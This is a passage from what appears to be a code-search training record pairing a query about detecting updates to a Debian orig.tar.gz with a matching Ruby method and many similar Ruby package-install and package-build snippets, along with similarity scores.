"def install_management\n # Needed to play with the configuration database.\n package 'debconf'\n package 'debconf-utils'\n\n # Keys for Debian packages.\n package 'debian-archive-keyring'\n\n # Fetch files via HTTP.\n package 'curl'\n package 'wget'\n\n package 'dpkg-dev' # Builds packages from source.\n package 'openssh-server' # SSH into the box.\n\n # For gems with native extensions.\n package 'build-essential'\n package 'g++'\n\n # Pull code from version control.\n package 'subversion'\n package 'git-core'\n\n package 'avahi-daemon' # mDNS, a.k.a. Bonjour\n package 'ddclient' # dynamic DNS\n end",
"def add_repo(pkg)\n if pkg[:repo] != nil\n if pkg[:repo].match(/^deb/)\n if pkg[:key] != nil\n # download and add key, add repo\n script \"add_repository\" do\n interpreter \"bash\"\n user \"root\"\n cwd \"/tmp\"\n code <<-EOS\n wget -q #{pkg[:key]} -O- | apt-key add -\n mkdir -p /etc/apt/sources.list.d\n echo \"#{pkg[:repo]}\" > /etc/apt/sources.list.d/virtualbox.list\n EOS\n end\n end\n elsif pkg[:repo].match(/^ppa/)\n # don't care about :key, add repo\n script \"add_repository\" do\n interpreter \"bash\"\n user \"root\"\n cwd \"/tmp\"\n code \"add-apt-repository #{pkg[:repo]}\"\n end\n end\n end\nend",
"def add(pkg)\n packages_by_name[pkg.name] = pkg\n end",
"def install(env); end",
"def install\n should = @resource.should(:ensure)\n self.debug \"Ensuring => #{should}\"\n wanted = @resource[:name]\n\n # XXX: We don't actually deal with epochs here.\n case should\n when true, false, Symbol\n # pass\n else\n # Add the package version\n wanted = \"#{wanted}-#{should}\"\n end\n\n #This has been tested with following zypper versions\n #SLE 10.2: 0.6.104\n #SLE 11.0: 1.0.8\n #OpenSuse 10.2: 0.6.13\n #OpenSuse 11.2: 1.2.8\n #Assume that this will work on newer zypper versions\n\n #extract version numbers and convert to integers\n major, minor, patch = zypper_version.scan(/\\d+/).map{ |x| x.to_i }\n self.debug \"Detected zypper version #{major}.#{minor}.#{patch}\"\n\n #zypper version < 1.0 does not support --quiet flag\n quiet = \"--quiet\"\n if major < 1\n quiet = \"--terse\"\n end\n\n license = \"--auto-agree-with-licenses\"\n noconfirm = \"--no-confirm\"\n\n #zypper 0.6.13 (OpenSuSE 10.2) does not support auto agree with licenses\n if major < 1 and minor <= 6 and patch <= 13\n zypper quiet, :install, noconfirm, wanted\n else\n zypper quiet, :install, license, noconfirm, wanted\n end\n\n unless self.query\n raise Puppet::ExecutionFailure.new(\n \"Could not find package #{self.name}\"\n )\n end\n end",
"def install\n # we prefetched also not installed ports so @portorigin may be present\n name = @portorigin || resource[:name]\n do_portupgrade name, install_options, resource[:package_settings]\n end",
"def install\n # we prefetched also not installed ports so @portorigin may be present\n name = @portorigin || resource[:name]\n do_portupgrade name, install_options, resource[:package_settings]\n end",
"def add_package(package)\n [package_handler(File.extname(package).tr(\".\", \"\")).add(content, package)].flatten.compact\n end",
"def solaris_install_local_package(package_path, noask_directory = nil)\n variant, version, arch, codename = self['platform'].to_array\n\n version = version.split('.')[0] # packages are only published for major versions\n\n error_message = nil\n unless variant == 'solaris'\n error_message = \"Can not call solaris_install_local_package for the \"\n error_message << \"non-solaris platform '#{variant}'\"\n end\n if version != '10' && version != '11'\n error_message = \"Solaris #{version} is not supported by the method \"\n error_message << 'solaris_install_local_package'\n end\n raise ArgumentError, error_message if error_message\n\n if version == '10'\n noask_text = self.noask_file_text\n create_remote_file self, File.join(noask_directory, 'noask'), noask_text\n\n install_cmd = \"gunzip -c #{package_path} | pkgadd -d /dev/stdin -a noask -n all\"\n elsif version == '11'\n install_cmd = \"pkg install -g #{package_path} puppet-agent\"\n end\n self.exec(Beaker::Command.new(install_cmd))\n end",
"def install_from_src(src_package, src_dir)\n package_dir = File.join(src_dir, src_package[:dir])\n unpack_src(src_package, src_dir)\n sudo <<-SUDO\n sh -c '\n cd #{package_dir};\n #{src_package[:configure]}\n #{src_package[:make]}\n #{src_package[:install]}\n #{src_package[:post_install]}\n '\n SUDO\n end",
"def install_golang_package(resource_name)\n ChefSpec::Matchers::ResourceMatcher.new(:golang_package, :install, resource_name)\n end",
"def install_packages packages\n case DISTRO[0]\n when :opensuse\n installed = %x[rpm -qa].split(\"\\n\")\n packages.select{|pkg| ! installed.detect{|d| d =~ /^#{Regexp.escape(pkg)}/ } }.each do |package|\n # puts \"Installing #{package} ...\"\n %x[sudo zypper install '#{package}']\n end\n when :solaris\n installed = `pkg-get -l`.split(\"\\n\")\n packages.select{|pkg| ! installed.include? pkg }.each do |package|\n sh \"sudo pkg-get install #{package}\"\n end\n else\n installed = `dpkg --list`.split(\"\\n\").map { |x| x.split[1] } # Hm, this is out of scope if defined outside.\n packages.select{ |pkg| ! installed.include? pkg }.each do |package|\n sh \"sudo apt-get -y install #{package}\"\n end\n end\nend",
"def install\n safe_system \"pax --insecure -rz -f Payload.gz -s ',./bin,#{bin},' -s ',./man,#{man},' -s ',./lib,#{lib},' -s ',./license_gpl_pdftk,#{prefix}/LICENSE,' -s ',./,#{prefix}/README/,'\"\n end",
"def install\n end",
"def install\n # nothing to do\n end",
"def install(package, opts = {}, adb_opts = {})\n opt_arg = \"\"\n opt_arg += \" -l\" if opts[:forwardlock]\n opt_arg += \" -r\" if opts[:reinstall]\n opt_arg += \" -s\" if opts[:sdcard]\n run_adb(\"install#{opt_arg} #{package}\", adb_opts)\n end",
"def install_gem(name, options)\n installer = Gem::DependencyInstaller.new(options)\n\n temp_argv(options[:extconf]) do\n log \"Installing #{name}\"\n installer.install(name, options[:version])\n end\n end",
"def install\n args = %w{install -q}\n if @resource[:source]\n args << \"-e\"\n if String === @resource[:ensure]\n args << \"#{@resource[:source]}@#{@resource[:ensure]}#egg=#{\n @resource[:name]}\"\n else\n args << \"#{@resource[:source]}#egg=#{@resource[:name]}\"\n end\n else\n case @resource[:ensure]\n when String\n args << \"#{@resource[:name]}==#{@resource[:ensure]}\"\n when :latest\n args << \"--upgrade\" << @resource[:name]\n else\n args << @resource[:name]\n end\n end\n args << pipproxyarg\n lazy_pip *args\n end",
"def kitchenplan_bundle_install\n\tKitchenplan::Log.info \"#{self.class} : Run kitchenplan bundle install\"\n\tsudo \"bundle install --binstubs=#{self.omnibus_path}/bin --quiet\"\n end",
"def build\n @log.info \"Packaging files\"\n pkgdir = File.join(@path, \"pkg\")\n FileUtils.mkdir_p pkgdir\n\n FileUtils.chmod(0755, Dir[\"#{Ian.debpath(@dir)}/*\"])\n FileUtils.chmod(0755, Ian.debpath(@dir))\n\n pkg = File.join(pkgdir, \"#{pkgname}.deb\")\n output = %x[fakeroot dpkg-deb -b #{@dir} #{pkg}]\n\n return [$?.success?, pkg, output]\n end",
"def install_package\n path = download_path\n windows_package 'Divvy' do\n source path\n installer_type :nsis\n action :install\n end\n end",
"def build_pkg(dist, arch, deps)\n start_dir = Dir.pwd\n build_dir = \"/tmp/rhobuild\"\n version = Rhoconnect::VERSION\n description = '\"Rhoconnect production environment\"'\n prefix = \"/opt/rhoconnect/installer\"\n gem_name = \"rhoconnect-#{version}.gem\"\n\n before_install_script = \"#{build_dir}/unix-like/pre_install.sh\"\n after_install_script = \"#{build_dir}/unix-like/post_install.sh\"\n before_remove_script = \"#{build_dir}/unix-like/pre_uninstall.sh\"\n after_remove_script = \"#{build_dir}/unix-like/post_uninstall.sh\"\n\n `rm -rf #{build_dir}` if File.exist?(\"#{build_dir}\")\n Dir.mkdir(\"#{build_dir}\")\n Dir.mkdir(\"#{build_dir}/unix-like\")\n\n # Copy all necessary Files into the build_dir\n system(\"cp install.sh Gemfile Gemfile.lock #{build_dir}\")\n system(\"cp -r installer/unix-like/*.sh #{build_dir}/unix-like\")\n system(\"cp -r installer/unix-like/*.rb #{build_dir}/unix-like\")\n system(\"cp pkg/#{gem_name} #{build_dir}\")\n\n # cd into the pkg dir so that fpm will create the package into the pkg dir.\n Dir.chdir(\"./pkg\") # it created by build task and should already exist\n\n # Construct fpm command\n fpm_cmd = \"fpm -s dir -t #{dist} -n rhoconnect -v #{version} -a #{arch} -C #{build_dir} --epoch 1 \" +\n \"--before-install #{before_install_script} --after-install #{after_install_script} \" +\n \"--before-remove #{before_remove_script} --after-remove #{after_remove_script} \" +\n \"--prefix #{prefix} --description #{description}\"\n # Add the list of dependencies to the fpm call\n deps.each { |dep| fpm_cmd << \" -d '#{dep}'\" }\n fpm_cmd << \" './'\"\n # Create the package\n system(fpm_cmd)\n # Leave no trace...\n system(\"rm -rf #{build_dir}\")\n Dir.chdir(start_dir)\nend"
] | [
"0.7270667",
"0.7244659",
"0.7169353",
"0.70323354",
"0.7023716",
"0.6977101",
"0.6951155",
"0.6922259",
"0.6880965",
"0.68577975",
"0.684019",
"0.6804202",
"0.6784884",
"0.67558724",
"0.6749211",
"0.6739366",
"0.67260814",
"0.67077416",
"0.67010355",
"0.6678488",
"0.6654429",
"0.6653443",
"0.6629358",
"0.6606326",
"0.65162903",
"0.6506606",
"0.6456502",
"0.64556205",
"0.64549667",
"0.6444388",
"0.6429329",
"0.6423803",
"0.6420406",
"0.63851583",
"0.63778615",
"0.6370828",
"0.63567644",
"0.6348215",
"0.63468647",
"0.63456506",
"0.6339706",
"0.6326554",
"0.632185",
"0.631788",
"0.63042265",
"0.6300589",
"0.6287876",
"0.6249372",
"0.62372863",
"0.6214829",
"0.6214263",
"0.6186617",
"0.61740404",
"0.6131668",
"0.6130622",
"0.6128316",
"0.6119799",
"0.6105746",
"0.61034745",
"0.6097761",
"0.6096183",
"0.6093147",
"0.6084481",
"0.60599905",
"0.6047717",
"0.603117",
"0.6023567",
"0.6018067",
"0.6018067",
"0.6000045",
"0.59998125",
"0.59996253",
"0.59957045",
"0.5970698",
"0.5967656",
"0.5960745",
"0.595837",
"0.595837",
"0.5957164",
"0.5953683",
"0.595022",
"0.5946439",
"0.5945351",
"0.5945193",
"0.5945193",
"0.59394795",
"0.5932248",
"0.5922555",
"0.58989245",
"0.58862066",
"0.5885396",
"0.58803076",
"0.58781123",
"0.58749735",
"0.58676726",
"0.586423",
"0.5863507",
"0.5860006",
"0.58564115",
"0.584844"
] | 0.7763115 | 0 |
We create a diff between the existing orig.tar.gz and the source directory to identify if there have been any updates Using 'diff' allows us to apply this test to all kind of packages | def package_updated?(pkginfo)
# append underscore to make sure version definition follows
registered_orig_tar_gz = reprepro.registered_files(debian_name(pkginfo) + "_",
rock_release_name,
"*.orig.tar.gz")
orig_file_names = Dir.glob("#{debian_name(pkginfo)}*.orig.tar.gz")
orig_file_names.each do |file|
FileUtils.rm file
end
if registered_orig_tar_gz.empty?
Packager.info "Apaka::Packaging::Debian::package_updated?: no existing orig.tar.gz found in reprepro"
else
Packager.info "Apaka::Packaging::Debian::package_updated?: existing orig.tar.gz found in reprepro: #{registered_orig_tar_gz}"
FileUtils.cp registered_orig_tar_gz.first, Dir.pwd
end
# Find an existing orig.tar.gz in the build directory
# ignoring the current version-timestamp
orig_file_name = Dir.glob("#{debian_name(pkginfo)}*.orig.tar.gz")
if orig_file_name.empty?
Packager.info "No filename found for #{debian_name(pkginfo)} (existing files: #{Dir.entries('.')} -- package requires update (regeneration of orig.tar.gz)"
return true
elsif orig_file_name.size > 1
raise RuntimeError, "Multiple versions of package #{debian_name(pkginfo)} in #{Dir.pwd} -- you have to fix this first"
else
orig_file_name = orig_file_name.first
end
!equal_pkg_content?(pkginfo, orig_file_name)
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def package_updated?(pkg)\n # Find an existing orig.tar.gz in the build directory\n # ignoring the current version-timestamp\n orig_file_name = Dir.glob(\"#{debian_name(pkg)}*.orig.tar.gz\")\n if orig_file_name.empty?\n return true\n elsif orig_file_name.size > 1\n Packager.warn \"Multiple version of package #{debian_name(pkg)} in #{Dir.pwd} -- you have to fix this first\"\n else\n orig_file_name = orig_file_name.first\n end\n\n # Create a local copy/backup of the current orig.tar.gz in .obs_package \n # and extract it there -- compare the actual source package\n FileUtils.cp(orig_file_name, OBS_LOCAL_TMP) \n Dir.chdir(OBS_LOCAL_TMP) do\n `tar xzf #{orig_file_name}`\n base_name = orig_file_name.sub(\".orig.tar.gz\",\"\")\n Dir.chdir(base_name) do\n diff_name = \"#{orig_file_name}.diff\"\n `diff -urN --exclude .git --exclude .svn --exclude CVS --exclude debian --exclude build #{pkg.srcdir} . > #{diff_name}`\n if File.open(diff_name).lines.any? \n return true\n end\n end\n end\n return false\n end",
"def file_diff(package, from, to, file)\n ret = true\n Dir.mktmpdir {|tmpdir| \n files_found = system(\"cd #{tmpdir} && #{osc_cmd} co #{from} #{package} #{file} && mv #{file} #{file}.new && #{osc_cmd} co #{to} #{package} #{file} >/dev/null 2>&1\")\n unless files_found\n puts \"=== Cannot check out file #{file} from package #{package}\"\n ret = true\n else\n ret = ! system(\"cd #{tmpdir} && diff #{file} #{file}.new\")\n end\n }\n ret\nend",
"def archive_differs_from_disk?(src, dest)\n modified = false\n archive = Archive::Reader.open_filename(src, nil, strip_components: new_resource.strip_components)\n Chef::Log.trace(\"Beginning the comparison of file mtime between contents of #{src} and #{dest}\")\n archive.each_entry do |e|\n pathname = ::File.expand_path(e.pathname, dest)\n if ::File.exist?(pathname)\n Chef::Log.trace(\"#{pathname} mtime is #{::File.mtime(pathname)} and archive is #{e.mtime}\")\n modified = true unless ::File.mtime(pathname) == e.mtime\n else\n Chef::Log.trace(\"#{pathname} doesn't exist on disk, but exists in the archive\")\n modified = true\n end\n end\n modified\n end",
"def diff(other)\n require_cmd! diff_cmd\n out = nil\n\n begin\n this_dir = unpack\n other_dir = other.is_a?(Polisher::Gem) ? other.unpack :\n (other.is_a?(Polisher::Git::Repo) ? other.path : other)\n result = AwesomeSpawn.run(\"#{diff_cmd} -r #{this_dir} #{other_dir}\")\n out = result.output.gsub(\"#{this_dir}\", 'a').gsub(\"#{other_dir}\", 'b')\n rescue\n ensure\n FileUtils.rm_rf this_dir unless this_dir.nil?\n FileUtils.rm_rf other_dir unless other_dir.nil? ||\n !other.is_a?(Polisher::Gem)\n end\n\n out\n end",
"def diff_gitignore\n system(\"diff .gitignore ~/code/tmpl/gitignore-gem\")\n end",
"def diff_gitignore\n system(\"diff .gitignore ~/code/tmpl/gitignore-gem\")\n end",
"def update_files_from(new_source)\n to_add = new_source.file_paths\n @metadata[:files] ||= {}\n @metadata[:files].each { |pkg,spec_files|\n (new_source.file_paths & to_add).each { |gem_file|\n # skip files already included in spec or in dir in spec\n has_file = spec_files.any? { |sf|\n gem_file.gsub(sf,'') != gem_file\n }\n\n to_add.delete(gem_file)\n to_add << gem_file.rpmize if !has_file &&\n !Gem.ignorable_file?(gem_file)\n }\n }\n\n @metadata[:new_files] = to_add.select { |f| !Gem.doc_file?(f) }\n @metadata[:new_docs] = to_add - @metadata[:new_files]\n end",
"def prepare_source_dir(orig_pkginfo, options = Hash.new)\n pkginfo = orig_pkginfo.dup\n\n options, unknown_options = Kernel.filter_options options,\n :existing_source_dir => nil,\n :packaging_dir => File.join(@build_dir, debian_name(pkginfo))\n\n pkg_dir = options[:packaging_dir]\n if not File.directory?(pkg_dir)\n FileUtils.mkdir_p pkg_dir\n end\n\n # Only when there is no importer or when the VCS supports distribution (here git)\n # then we allow to use the local version\n support_local_import = false\n if !pkginfo.importer_type || pkginfo.importer_type == :git\n Packager.info \"Import from local repository is supported for #{pkginfo.name}\"\n support_local_import = true\n else\n Packager.info \"Import from local repository is not supported for #{pkginfo.name}\"\n end\n\n Packager.debug \"Preparing source dir #{pkginfo.name}\"\n # If we have given an existing source directory we should use it, \n # but only if it is a git repository\n pkg_target_importdir = File.join(pkg_dir, plain_dir_name(pkginfo))\n if support_local_import && existing_source_dir = options[:existing_source_dir]\n import_from_local_src_dir(pkginfo, existing_source_dir, pkg_target_importdir)\n # update to the new srcdir\n pkginfo.srcdir = pkg_target_importdir\n else\n pkginfo.import(pkg_target_importdir)\n end\n # remove these even on fresh imports. some repositories\n # have prepopulated build directories and similar\n remove_excluded_dirs(pkg_target_importdir)\n remove_excluded_files(pkg_target_importdir)\n\n pkginfo\n end",
"def make_package_diff(before, after)\n installed = package_diff after, before\n removed = package_diff before, after\n { 'installed' => installed, 'removed' => removed }\n end",
"def test_dry_run\n @options[:dry_run] = true\n\n gemfile = bake_testing_gem\n\n patches = []\n patches << bake_change_file_patch\n\n # Creates new patched gem in @gems_dir\n patcher = Gem::Patcher.new(gemfile, @gems_dir)\n patched_gem = patcher.patch_with(patches, @options)\n\n # Unpack\n package = Gem::Package.new patched_gem\n package.extract_files @gems_dir\n\n # Still the same\n assert_equal original_file, file_contents('foo.rb')\n end",
"def same?(previous_revision, active_revision, paths = nil)\n run(\"#{git} diff '#{previous_revision}'..'#{active_revision}' --exit-code --name-only -- #{Array(paths).join(' ')} >/dev/null 2>&1\")\n end",
"def local_diff\n `cd #{@local_path} && git diff HEAD`\n end",
"def updated_source_file?; end",
"def test_gem_should_not_change\n gemfile = bake_testing_gem\n\n patches = []\n patches << bake_incorrect_patch\n\n # Create a new patched gem in @gems_dir\n patcher = Gem::Patcher.new(gemfile, @gems_dir)\n patched_gem = patcher.patch_with(patches, @options)\n\n # Unpack\n package = Gem::Package.new patched_gem\n package.extract_files @gems_dir\n\n assert_equal original_file, file_contents('foo.rb')\n assert_equal original_gemspec, current_gemspec\n end",
"def outdated?\n\t\t\t# Existing directories are never outdated\n\t\t\t!built?\n\t\tend",
"def test_new_file_patch\n @options[:strip] = 0\n \n gemfile = bake_testing_gem\n\n patches = []\n patches << bake_new_file_patch\n\n # Create a new patched gem in @gems_dir\n patcher = Gem::Patcher.new(gemfile, @gems_dir)\n patched_gem = patcher.patch_with(patches, @options)\n\n # Unpack\n package = Gem::Package.new patched_gem\n package.extract_files @gems_dir\n\n assert_equal original_file, file_contents('bar.rb')\n end",
"def cover_source_by source, specfile\n _source = File.expand_path( \"../../../#{source}\", __FILE__ )\n _spec = File.expand_path(\"../../#{specfile}\", __FILE__)\n FileUtils.touch(_spec) if File.mtime(_source) > File.mtime(_spec)\n File.mtime(_source) <= File.mtime(_spec)\nend",
"def diff\n require \"tempfile\"\n new_file = Tempfile.new([\"new_config.\", \".yml\"])\n new_file.write(sorted_file)\n result = `git diff --no-index -- #{file} #{new_file.path}`.gsub(\n no_slash_beginning(new_file.path),\n no_slash_beginning(file)\n )\n ensure\n new_file.close\n new_file.unlink\n result\n end",
"def move_files_if(src_files, dst_dir = nil)\n Dir[src_files].each do |srcfile|\n cp_action = 0\n dst_dir = File.dirname(src_files).gsub(TMPDIR, '').gsub(/^\\//, '') if dst_dir == nil\n dst_dir << \"/\" unless dst_dir =~ /\\/$/\n dstfile = \"#{dst_dir}#{File.basename(srcfile)}\"\n\n # check if exists similar one in hdl/ directory\n if !File.file? dstfile\n cp_action = 1\n # if exists but differs\n elsif !FileUtils.identical?(dstfile, srcfile) then\n \n puts \"-\" * 43 << \"existing one\" << \"-\" * 44 << '|' << \"-\" * 44 << \"generated\" << \"-\" * 43 << \"\\n\" \n puts %x{diff -y -W200 #{dstfile} #{srcfile} | less }\n puts \"-\" * 200\n print \"Use generated file #{File.basename(srcfile)}? [Y/N] \"\n if $stdin.gets =~ /y/i\n cp_action = 2\n end\n end\n if cp_action > 0\n FileUtils.mkdir_p(dst_dir) unless File.directory? dst_dir\n FileUtils.cp srcfile, dstfile\n if cp_action == 1\n printf(\"%5s %20s %s\\n\",\"\", \" new file added:\", dstfile)\n else\n printf(\"%20s %s\\n\",\" overwrited:\", dstfile)\n end\n end\n end\nend",
"def same?(previous_revision, active_revision, paths=nil)\n run_and_success?(\"#{git} diff '#{previous_revision}'..'#{active_revision}' --exit-code --name-only -- #{Array(paths).join(' ')} >/dev/null 2>&1\")\n end",
"def test_patch\n checkout_dir =File.expand_path(File.join('..','..','..','sequence', 'repository', 'Unidata@thredds'),File.dirname(__FILE__))\n repos = Rugged::Repository.new(checkout_dir)\n from = repos.lookup('49429686c3be8c3cb0aea17fca3e6684706d5fa1')\n to = repos.lookup('f63544cc69b49664a0487bf064ce0c7f64b40641')\n puts \"from #{from}\"\n puts \"to #{to}\"\n diff = to.patch(from)\n puts diff.content\n puts \"patch\"\n diff.patch.lines do |line|\n puts line\n end\n \n #.lines.each do |line|\nend",
"def test_dirs(desc, dir1, dir2)\n\n test_missing_files(desc, dir1, dir2)\n\n dir_files(dir1).each do |file|\n file2 = file.sub(dir1, dir2)\n if File.exist?(file2)\n if diff = diff_file(file, file2)\n @failures << {\n desc: \"#{desc}\\nDiff of file: #{file.sub(dir1+'/', '')}\\n\",\n result: format_diff(diff)\n }\n pout 'F'.red\n else\n pout '.'.green\n end\n end\n end\nend",
"def test_changed\n dir = \"changed_dir\"\n dir1 = \"changed_dir1\"\n dir2 = \"changed_dir2\"\n dir_path = File.join(@wc_path, dir)\n dir1_path = File.join(@wc_path, dir1)\n dir2_path = File.join(@wc_path, dir2)\n dir_svn_path = dir\n dir1_svn_path = dir1\n dir2_svn_path = dir2\n\n file1 = \"changed1.txt\"\n file2 = \"changed2.txt\"\n file3 = \"changed3.txt\"\n file4 = \"changed4.txt\"\n file5 = \"changed5.txt\"\n file1_path = File.join(@wc_path, file1)\n file2_path = File.join(dir_path, file2)\n file3_path = File.join(@wc_path, file3)\n file4_path = File.join(dir_path, file4)\n file5_path = File.join(@wc_path, file5)\n file1_svn_path = file1\n file2_svn_path = [dir_svn_path, file2].join(\"/\")\n file3_svn_path = file3\n file4_svn_path = [dir_svn_path, file4].join(\"/\")\n file5_svn_path = file5\n\n first_rev = nil\n\n log = \"added 3 dirs\\nanded 5 files\"\n make_context(log) do |ctx|\n\n ctx.mkdir([dir_path, dir1_path, dir2_path])\n\n FileUtils.touch(file1_path)\n FileUtils.touch(file2_path)\n FileUtils.touch(file3_path)\n FileUtils.touch(file4_path)\n FileUtils.touch(file5_path)\n ctx.add(file1_path)\n ctx.add(file2_path)\n ctx.add(file3_path)\n ctx.add(file4_path)\n ctx.add(file5_path)\n\n commit_info = ctx.commit(@wc_path)\n first_rev = commit_info.revision\n\n editor = traverse(Svn::Delta::ChangedEditor, commit_info.revision, true)\n assert_equal([\n file1_svn_path, file2_svn_path,\n file3_svn_path, file4_svn_path,\n file5_svn_path,\n ].sort,\n editor.added_files)\n assert_equal([], editor.updated_files)\n assert_equal([], editor.deleted_files)\n assert_equal([].sort, editor.updated_dirs)\n assert_equal([].sort, editor.deleted_dirs)\n assert_equal([\n \"#{dir_svn_path}/\",\n \"#{dir1_svn_path}/\",\n \"#{dir2_svn_path}/\"\n ].sort,\n editor.added_dirs)\n end\n\n log = \"deleted 2 dirs\\nchanged 3 files\\ndeleted 2 files\\nadded 3 files\"\n make_context(log) do |ctx|\n\n dir3 = \"changed_dir3\"\n dir4 = \"changed_dir4\"\n dir3_path = File.join(dir_path, dir3)\n dir4_path = File.join(@wc_path, dir4)\n dir3_svn_path = [dir_svn_path, dir3].join(\"/\")\n dir4_svn_path = dir4\n\n file6 = \"changed6.txt\"\n file7 = \"changed7.txt\"\n file8 = \"changed8.txt\"\n file9 = \"changed9.txt\"\n file10 = \"changed10.txt\"\n file6_path = File.join(dir_path, file6)\n file7_path = File.join(@wc_path, file7)\n file8_path = File.join(dir_path, file8)\n file9_path = File.join(dir_path, file9)\n file10_path = File.join(dir_path, file10)\n file6_svn_path = [dir_svn_path, file6].join(\"/\")\n file7_svn_path = file7\n file8_svn_path = [dir_svn_path, file8].join(\"/\")\n file9_svn_path = [dir_svn_path, file9].join(\"/\")\n file10_svn_path = [dir_svn_path, file10].join(\"/\")\n\n File.open(file1_path, \"w\") {|f| f.puts \"changed\"}\n File.open(file2_path, \"w\") {|f| f.puts \"changed\"}\n File.open(file3_path, \"w\") {|f| f.puts \"changed\"}\n ctx.rm_f([file4_path, file5_path])\n FileUtils.touch(file6_path)\n FileUtils.touch(file7_path)\n FileUtils.touch(file8_path)\n ctx.add(file6_path)\n ctx.add(file7_path)\n ctx.add(file8_path)\n ctx.cp(file1_path, file9_path)\n ctx.cp(file2_path, file10_path)\n ctx.mv(dir2_path, dir3_path)\n ctx.cp(dir1_path, dir4_path)\n ctx.rm(dir1_path)\n\n commit_info = ctx.commit(@wc_path)\n second_rev = commit_info.revision\n\n editor = traverse(Svn::Delta::ChangedEditor, commit_info.revision, true)\n assert_equal([file1_svn_path, file2_svn_path, file3_svn_path].sort,\n editor.updated_files)\n assert_equal([file4_svn_path, file5_svn_path].sort,\n editor.deleted_files)\n assert_equal([file6_svn_path, file7_svn_path, file8_svn_path].sort,\n editor.added_files)\n assert_equal([].sort, editor.updated_dirs)\n assert_equal([\n [file9_svn_path, file1_svn_path, first_rev],\n [file10_svn_path, file2_svn_path, first_rev],\n ].sort_by{|x| x[0]},\n editor.copied_files)\n assert_equal([\n [\"#{dir3_svn_path}/\", \"#{dir2_svn_path}/\", first_rev],\n [\"#{dir4_svn_path}/\", \"#{dir1_svn_path}/\", first_rev],\n ].sort_by{|x| x[0]},\n editor.copied_dirs)\n assert_equal([\"#{dir1_svn_path}/\", \"#{dir2_svn_path}/\"].sort,\n editor.deleted_dirs)\n assert_equal([].sort, editor.added_dirs)\n end\n end",
"def compare_inventory_files(old_file, new_file)\n old_inventory = inventory_from(old_file)\n\n\n new_inventory = inventory_from(new_file)\n\n x = (new_inventory - old_inventory).length\n # Excercise: add number of added files\n puts \"The following #{x} file(s) have been added:\"\n puts new_inventory - old_inventory\n\n y = (old_inventory - new_inventory).length\n\n puts \"\"\n # Excercise: add number of deleted files\n puts \"The following #{y} file(s) have been deleted:\"\n puts old_inventory - new_inventory\n\n x = new_inventory.length - x\n\n y = old_inventory.length - y \n\n puts \"\"\n # Excercise: add number of unchanged files\n puts \"Unchanged files: #{x} \"\n puts \"Verification of unchanged files: #{y} \"\nend",
"def has_changes?\r\n @source_files.size > 0\r\n end",
"def compareDirs( relative = \"\" )\n # Combine the base path with the relative path\n original = File.expand_path( File.join( $original, relative ) )\n backup = File.expand_path( File.join( $backup, relative ) )\n\n if $options[:verbose]\n STDOUT.puts \"DEBUG: Comparing [#{original}] to [#{backup}]\" \n end\n\n # Return if this directory has been excluded\n if $options[:ignore].include?( original ) or $options[:ignore].include?( backup )\n $skippedCount += 1\n STDOUT.puts \"SKIP: Skipping comparison of [#{original}] and [#{backup}]\"\n return\n end\n\n # Make sure both directories exist\n unless File.directory?( original ) and File.directory?( backup )\n STDOUT.puts \"DIR: [#{original}] not found in [#{backup}]\"\n # The directory not existing counts as one difference.\n $diffCount += 1 \n # Each item in the directory counts as yet another item processed and yet\n # another difference.\n item_count = countItems( original )\n $itemCount += item_count\n $diffCount += item_count\n return\n end\n\n # If both directories exist, we check their contents\n begin\n Dir.foreach( original ) do |item|\n next if item == \".\" or item == \"..\"\n $itemCount += 1\n origPath = File.join( original, item )\n backupPath = File.join( backup, item )\n\n # This check is independent of whether or not the path is a directory or\n # a file. If either is a symlink, make sure they are both symlinks, and\n # that they link to the same thing.\n if File.symlink?( origPath ) || File.symlink?( backupPath )\n if !(File.symlink?( origPath ) && File.symlink?( backupPath )) ||\n File.readlink( origPath ) != File.readlink( backupPath )\n\n STDOUT.puts \"SYMMIS: Symlink mismatch [#{origPath}] and [#{backupPath}]\"\n\n # Count the differing symlink.\n $diffCount += 1\n\n # FIXME: If follow symlinks is on, we want to count everything that\n # was under that missing symlink directory too.\n\n # We know these paths are different, so move on to the next one.\n next\n end\n end\n\n if File.directory? origPath\n # Skip symlinks if told to do so...\n if File.symlink?( origPath ) and not $options[:follow]\n $skippedCount += 1\n STDOUT.puts \"SYMLINK: [#{origPath}] skipped.\"\n next\n end\n # Stay on one filesystem if told to do so...\n outerDev = File::Stat.new( original ).dev\n innerDev = File::Stat.new( origPath ).dev\n if outerDev != innerDev and $options[:one_filesystem]\n $skippedCount += 1\n STDOUT.puts \"DIFFFS: [#{origPath}] is on a different file system. Skipped.\"\n next\n end\n compareDirs( File.join( relative, item ) )\n else # It's a file\n unless sameFile( origPath, backupPath )\n $diffCount += 1\n STDOUT.puts \"FILE: [#{origPath}] not found at, or doesn't match [#{backupPath}]\"\n end\n end\n end # Dir.foreach\n rescue Errno::EACCES\n STDOUT.puts \"ERROR: Can't read directory [#{original}]\"\n $errorCount += 1\n end\nend",
"def compare_paths(src_path, dst_path)\n match = true\n # assume linux\n md5sum = \"md5sum\"\n md5sum = \"md5\" if node.platform == \"freebsd\"\n\n lib_files = `ls #{src_path}/`.split(/\\n/)\n lib_files.each do |file|\n src = `#{md5sum} #{src_path}/#{file}`.split(/\\s+/)\n dst = `#{md5sum} #{dst_path}/#{file}`.split(/\\s+/)\n match = false if (src[0] != dst[0])\n end\n return match\nend",
"def diff\n deprecation_notice!\n downstream = @cisauraus.downstreams(app, 1).first\n verify_downstream! downstream\n\n print_and_flush \"Comparing #{app} to #{downstream}...\"\n\n diff = @cisauraus.diff(app)\n print_and_flush \"done, \"\n\n if diff.size > 0\n display \"#{app} ahead by #{diff.size} #{plural('commit', diff.size)}:\"\n diff.each do |commit|\n commit_detail = `git log -n 1 --pretty=format:\" %h %ad %s (%an)\" --date=short #{commit} 2>/dev/null`\n if $?.exitstatus == 0\n display commit_detail\n else\n display \" #{commit}\"\n end\n end\n else\n display \"everything is up to date\"\n end\n end",
"def test_change_file_patch\n gemfile = bake_testing_gem\n\n patches = []\n patches << bake_change_file_patch\n\n # Creates new patched gem in @gems_dir\n patcher = Gem::Patcher.new(gemfile, @gems_dir)\n patched_gem = patcher.patch_with(patches, @options)\n\n # Unpack\n package = Gem::Package.new patched_gem\n package.extract_files @gems_dir\n\n assert_equal patched_file, file_contents('foo.rb')\n end",
"def pr_contains_code_changes\n files = danger_file.git.added_files + danger_file.git.modified_files\n\n !files.grep(/.swift/).empty?\n end",
